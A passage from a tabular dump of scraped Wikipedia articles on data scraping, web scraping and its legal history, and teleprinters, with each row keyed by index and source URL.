generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
163 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#Screen_scraping | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
164 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#HTML_parsing | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
165 | https://en.wikipedia.org/wiki/Web_scraping | https://eu.wikipedia.org/wiki/Web_scraping | Web scraping software-programen bidez web guneetatik informazioa ateratzeko erabilitako teknika bat da. Normalean, programa horiek Webean pertsona bat nabigatzen dutela simulatzen dute, HTTP protokoloa eskuz erabilita, edo nabigatzaile bat aplikazio batean txertatuz. Azken urteotan, web-scraping-a asko erabiltzen da web-posizionamenduaren sektorean, kalitatezko edukiak sortzeko datu kopuru handiak jaso eta antolatzeko dituen gaitasunarengatik. 1 Administratzaileak hainbat teknika erabil ditzake webgune batean scraperren eskaerak geldiarazteko edo oztopatzeko: |
166 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Teleprinter | A teleprinter (teletypewriter, teletype or TTY) is an electromechanical device that can be used to send and receive typed messages through various communications channels, in both point-to-point and point-to-multipoint configurations. Initially, from 1887 at the earliest, teleprinters were used in telegraphy. 1 Electrical telegraphy had been developed decades earlier in the late 1830s and 1840s, 2 then using simpler Morse key equipment and telegraph operators. The introduction of teleprinters automated much of this work and eventually largely replaced skilled operators versed in Morse code with typists and machines communicating faster via Baudot code. With the development of early computers in the 1950s, 3 teleprinters were adapted to allow typed data to be sent to a computer, and responses printed. Some teleprinter models could also be used to create punched tape for data storage (either from typed input or from data received from a remote source) and to read back such tape for local printing or transmission. A teleprinter attached to a modem could also communicate through telephone lines. This latter configuration was often used to connect teleprinters to remote computers, particularly in time-sharing environments. Teleprinters have largely been replaced by fully electronic computer terminals which typically have a computer monitor instead of a printer (though the term "TTY" is still occasionally used to refer to them, such as in Unix systems). Teleprinters are still widely used in the aviation industry (see AFTN and airline teletype system), 4 and variants called Telecommunications Devices for the Deaf (TDDs) are used by the hearing impaired for typed communications over ordinary telephone lines. The teleprinter evolved through a series of inventions by a number of engineers, including Samuel Morse, Alexander Bain, Royal Earl House, David Edward Hughes, Emile Baudot, Donald Murray, Charles L. Krum, Edward Kleinschmidt and Frederick G. Creed. Teleprinters were invented in order to send and receive messages without the need for operators trained in the use of Morse code. A system of two teleprinters, with one operator trained to use a keyboard, replaced two trained Morse code operators. The teleprinter system improved message speed and delivery time, making it possible for messages to be flashed across a country with little manual intervention. 5 There were a number of parallel developments on both sides of the Atlantic Ocean. In 1835 Samuel Morse devised a recording telegraph, and Morse code was born. 6 Morse's instrument used a current to displace the armature of an electromagnet, which moved a marker, therefore recording the breaks in the current. Cooke Wheatstone received a British patent covering telegraphy in 1837 and a second one in 1840 which described a type-printing telegraph with steel type fixed at the tips of petals of a rotating brass daisy-wheel, struck by an "electric hammer" to print Roman letters through carbon paper onto a moving paper tape. 7 In 1841 Alexander Bain devised an electromagnetic printing telegraph machine. It used pulses of electricity created by rotating a dial over contact points to release and stop a type-wheel turned by weight-driven clockwork; a second clockwork mechanism rotated a drum covered with a sheet of paper and moved it slowly upwards so that the type-wheel printed its signals in a spiral. The critical issue was to have the sending and receiving elements working synchronously. Bain attempted to achieve this using centrifugal governors to closely regulate the speed of the clockwork. It was patented, along with other devices, on April 21, 1841. 8 By 1846, the Morse telegraph service was operational between Washington, D.C., and New York. Royal Earl House patented his printing telegraph that same year. He linked two 28 key piano-style keyboards by wire. Each piano key represented a letter of the alphabet and when pressed caused the corresponding letter to print at the receiving end. A "shift" key gave each main key two optional values. A 56 character typewheel at the sending end was synchronised to coincide with a similar wheel at the receiving end. If the key corresponding to a particular character was pressed at the home station, it actuated the typewheel at the distant station just as the same character moved into the printing position, in a way similar to the (much later) daisy wheel printer. It was thus an example of a synchronous data transmission system. House's equipment could transmit around 40 instantly readable words per minute, but was difficult to manufacture in bulk. The printer could copy and print out up to 2,000 words per hour. This invention was first put in operation and exhibited at the Mechanics Institute in New York in 1844. Landline teleprinter operations began in 1849, when a circuit was put in service between Philadelphia and New York City. 9 In 1855, David Edward Hughes introduced an improved machine built on the work of Royal Earl House. In less than two years, a number of small telegraph companies, including Western Union in early stages of development, united to form one large corporation Western Union Telegraph Co. to carry on the business of telegraphy on the Hughes system. 10 In France, mile Baudot designed in 1874 a system using a five-unit code, which began to be used extensively in that country from 1877. The British Post Office adopted the Baudot system for use on a simplex circuit between London and Paris in 1897, and subsequently made considerable use of duplex Baudot systems on their Inland Telegraph Services. 11 During 1901, Baudot's code was modified by Donald Murray (1865 1945, originally from New Zealand), prompted by his development of a typewriter-like keyboard. The Murray system employed an intermediate step, a keyboard perforator, which allowed an operator to punch a paper tape, and a tape transmitter for sending the message from the punched tape. At the receiving end of the line, a printing mechanism would print on a paper tape, and or a reperforator could be used to make a perforated copy of the message. 12 As there was no longer a direct correlation between the operator's hand movement and the bits transmitted, there was no concern about arranging the code to minimize operator fatigue, and instead Murray designed the code to minimize wear on the machinery, assigning the code combinations with the fewest punched holes to the most frequently used characters. The Murray code also introduced what became known as "format effectors" or "control characters" the CR (Carriage Return) and LF (Line Feed) codes. A few of Baudot's codes moved to the positions where they have stayed ever since: the NULL or BLANK and the DEL code. NULL BLANK was used as an idle code for when no messages were being sent. 5 In the United States in 1902, electrical engineer Frank Pearne approached Joy Morton, head of Morton Salt, seeking a sponsor for research into the practicalities of developing a printing telegraph system. Joy Morton needed to determine whether this was worthwhile and so consulted mechanical engineer Charles L. Krum, who was vice president of the Western Cold Storage Company. Krum was interested in helping Pearne, so space was set up in a laboratory in the attic of Western Cold Storage. Frank Pearne lost interest in the project after a year and left to get involved in teaching. Krum was prepared to continue Pearne’s work, and in August, 1903 a patent was filed for a 'typebar page printer'. 13 In 1904, Krum filed a patent for a 'type wheel printing telegraph machine' 14 which was issued in August, 1907. In 1906 Charles Krum's son, Howard Krum, joined his father in this work. It was Howard who developed and patented the start-stop synchronizing method for code telegraph systems, which made possible the practical teleprinter. 15 In 1908, a working teleprinter was produced by the Morkrum Company (formed between Joy Morton and Charles Krum), called the Morkrum Printing Telegraph, which was field tested with the Alton Railroad. In 1910, the Morkrum Company designed and installed the first commercial teletypewriter system on Postal Telegraph Company lines between Boston and New York City using the "Blue Code Version" of the Morkrum Printing Telegraph. 16 17 In 1916, Edward Kleinschmidt filed a patent application for a typebar page printer. 18 In 1919, shortly after the Morkrum company obtained their patent for a start-stop synchronizing method for code telegraph systems, which made possible the practical teleprinter, Kleinschmidt filed an application titled "Method of and Apparatus for Operating Printing Telegraphs" 19 which included an improved start-stop method. 20 The basic start-stop procedure, however, is much older than the Kleinschmidt and Morkrum inventions. It was already proposed by D'Arlincourt in 1870. 21 Instead of wasting time and money in patent disputes on the start-stop method, Kleinschmidt and the Morkrum Company decided to merge and form the Morkrum-Kleinschmidt Company in 1924. The new company combined the best features of both their machines into a new typewheel printer for which Kleinschmidt, Howard Krum, and Sterling Morton jointly obtained a patent. 20 In 1924 Britain's Creed Company, founded by Frederick G. Creed, entered the teleprinter field with their Model 1P, a page printer, which was soon superseded by the improved Model 2P. In 1925 Creed acquired the patents for Donald Murray's Murray code, a rationalised Baudot code. The Model 3 tape printer, Creed’s first combined start-stop machine, was introduced in 1927 for the Post Office telegram service. This machine printed received messages directly on to gummed paper tape at a rate of 65 words per minute. Creed created his first keyboard perforator, which used compressed air to punch the holes. He also created a reperforator (receiving perforator) and a printer. The reperforator punched incoming Morse signals on to paper tape and the printer decoded this tape to produce alphanumeric characters on plain paper. This was the origin of the Creed High Speed Automatic Printing System, which could run at an unprecedented 200 words per minute. His system was adopted by the Daily Mail for daily transmission of the newspaper's contents. The Creed Model 7 page printing teleprinter was introduced in 1931 and was used for the inland Telex service. It worked at a speed of 50 baud, about 66 words a minute, using a code based on the Murray code. citation needed A teleprinter system was installed in the Bureau of Lighthouses, Airways Division, Flight Service Station Airway Radio Stations system in 1928, carrying administrative messages, flight information and weather reports. 22 By 1938, the teleprinter network, handling weather traffic, extended over 20,000 miles, covering all 48 states except Maine, New Hampshire, and South Dakota. 23 Teleprinters could use a variety of different communication channels. These included a simple pair of wires, public switched telephone networks, dedicated non-switched telephone circuits (leased lines), switched networks that operated similarly to the public telephone network (telex), and radio and microwave links (telex-on-radio, or TOR). There were at least five major types of teleprinter networks: Before the computer revolution (and information processing performance improvements thanks to Moore's law) made it possible to securely encrypt voice and video calls, teleprinters were long used in combination with electromechanical or electronic cryptographic devices to provide secure communication channels. Being limited to text only was an acceptable trade-off for security. Most teleprinters used the 5 bit International Telegraph Alphabet No. 2 (ITA2). This was limited to 32 codes (25 32). One had to use "FIGS" (for "figures") and "LTRS" (for "letters") keys to shift state, for a combined character set sufficient to type both letters and numbers, as well as some special characters. (The letters were uppercase only.) Special versions of teleprinters had FIGS characters for specific applications, such as weather symbols for weather reports. Print quality was poor by modern standards. The ITA2 code was used asynchronously with start and stop bits: the asynchronous code design was intimately linked with the start-stop electro-mechanical design of teleprinters. (Early systems had used synchronous codes, but were hard to synchronize mechanically). Other codes, such as FIELDATA and Flexowriter, were introduced but never became as popular as ITA2. Mark and space are terms describing logic levels in teleprinter circuits. The native mode of communication for a teleprinter is a simple series DC circuit that is interrupted, much as a rotary dial interrupts a telephone signal. The marking condition is when the circuit is closed (current is flowing), the spacing condition is when the circuit is open (no current is flowing). The "idle" condition of the circuit is a continuous marking state, with the start of a character signalled by a "start bit", which is always a space. Following the start bit, the character is represented by a fixed number of bits, such as 5 bits in the ITA2 code, each either a mark or a space to denote the specific character or machine function. After the character's bits, the sending machine sends one or more stop bits. The stop bits are marking, so as to be distinct from the subsequent start bit. If the sender has nothing more to send, the line simply remains in the marking state (as if a continuing series of stop bits) until a later space denotes the start of the next character. The time between characters need not be an integral multiple of a bit time, but it must be at least the minimum number of stop bits required by the receiving machine. When the line is broken, the continuous spacing (open circuit, no current flowing) causes a receiving teleprinter to cycle continuously, even in the absence of stop bits. It prints nothing because the characters received are all zeros, the ITA2 blank (or ASCII) null character. Teleprinter circuits were generally leased from a communications common carrier and consisted of ordinary telephone cables that extended from the teleprinter located at the customer location to the common carrier central office. These teleprinter circuits were connected to switching equipment at the central office for Telex and TWX service. Private line teleprinter circuits were not directly connected to switching equipment. Instead, these private line circuits were connected to network hubs and repeaters configured to provide point to point or point to multipoint service. More than two teleprinters could be connected to the same wire circuit by means of a current loop. Earlier teleprinters had three rows of keys and only supported upper case letters. They used the 5 bit ITA2 code and generally worked at 60 to 100 words per minute. Later teleprinters, specifically the Teletype Model 33, used ASCII code, an innovation that came into widespread use in the 1960s as computers became more widely available. "Speed", intended to be roughly comparable to words per minute, is the standard term introduced by Western Union for a mechanical teleprinter data transmission rate using the 5 bit ITA2 code that was popular in the 1940s and for several decades thereafter. Such a machine would send 1 start bit, 5 data bits, and 1.42 stop bits. This unusual stop bit time is actually a rest period to allow the mechanical printing mechanism to synchronize in the event that a garbled signal is received. 26 This is true especially on high frequency radio circuits where selective fading is present. Selective fading causes the mark signal amplitude to be randomly different from the space signal amplitude. Selective fading, or Rayleigh fading can cause two carriers to randomly and independently fade to different depths. 27 Since modern computer equipment cannot easily generate 1.42 bits for the stop period, common practice is to either approximate this with 1.5 bits, or to send 2.0 bits while accepting 1.0 bits receiving. For example, a "60 speed" machine is geared at 45.5 baud (22.0 ms per bit), a "66 speed" machine is geared at 50.0 baud (20.0 ms per bit), a "75 speed" machine is geared at 56.9 baud (17.5 ms per bit), a "100 speed" machine is geared at 74.2 baud (13.5 ms per bit), and a "133 speed" machine is geared at 100.0 baud (10.0 ms per bit). 60 speed became the de facto standard for amateur radio RTTY operation because of the widespread availability of equipment at that speed and the U.S. Federal Communications Commission (FCC) restrictions to only 60 speed from 1953 to 1972. Telex, news agency wires and similar services commonly used 66 speed services. There was some migration to 75 and 100 speed as more reliable devices were introduced. However, the limitations of HF transmission such as excessive error rates due to multipath distortion and the nature of ionospheric propagation kept many users at 60 and 66 speed. Most audio recordings in existence today are of teleprinters operating at 60 words per minute, and mostly of the Teletype Model 15. Another measure of the speed of a teletypewriter was in total "operations per minute (OPM) . For example, 60 speed was usually 368 OPM, 66 speed was 404 OPM, 75 speed was 460 OPM, and 100 speed was 600 OPM. Western Union Telexes were usually set at 390 OPM, with 7.0 total bits instead of the customary 7.42 bits. Both wire-service and private teleprinters had bells to signal important incoming messages and could ring 24 7 while the power was turned on. For example, ringing 4 bells on UPI wire-service machines meant an "Urgent" message; 5 bells was a "Bulletin"; and 10 bells was a FLASH, used only for very important news. The teleprinter circuit was often linked to a 5 bit paper tape punch (or "reperforator") and reader, allowing messages received to be resent on another circuit. Complex military and commercial communications networks were built using this technology. Message centers had rows of teleprinters and large racks for paper tapes awaiting transmission. Skilled operators could read the priority code from the hole pattern and might even feed a "FLASH PRIORITY" tape into a reader while it was still coming out of the punch. Routine traffic often had to wait hours for relay. Many teleprinters had built-in paper tape readers and punches, allowing messages to be saved in machine-readable form and edited off-line. Communication by radio, known as radioteletype or RTTY (pronounced ritty), was also common, especially among military users. Ships, command posts (mobile, stationary, and even airborne) and logistics units took advantage of the ability of operators to send reliable and accurate information with a minimum of training. Amateur radio operators continue to use this mode of communication today, though most use computer-interface sound generators, rather than legacy hardware teleprinter equipment. Numerous modes are in use within the "ham radio" community, from the original ITA2 format to more modern, faster modes, which include error-checking of characters. A typewriter or electromechanical printer can print characters on paper, and execute operations such as move the carriage back to the left margin of the same line (carriage return), advance to the same column of the next line (line feed), and so on. Commands to control non-printing operations were transmitted in exactly the same way as printable characters by sending control characters with defined functions (e.g., the line 